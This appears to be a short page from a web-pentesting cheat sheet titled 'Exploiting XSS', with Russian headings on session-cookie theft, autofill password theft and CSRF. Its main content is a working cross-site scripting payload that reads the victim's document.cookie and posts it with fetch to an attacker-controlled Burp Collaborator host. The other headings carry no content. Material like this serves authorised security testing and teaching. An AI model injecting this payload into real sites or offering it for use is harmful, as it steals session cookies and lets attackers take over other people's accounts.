Exploiting XSS
Кража сессии (куки)
<script>
let data = {
"cc": document.cookie
};
fetch("https://<YOU-COLLABORATOR>.burpcollaborator.net/", {
method: 'POST',
mode: 'no-cors',
credentials: 'include',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
redirect: 'follow',
body: JSON.stringify(data)
});
</script>Кража паролей из форм автозаполнения
CSRF
Last updated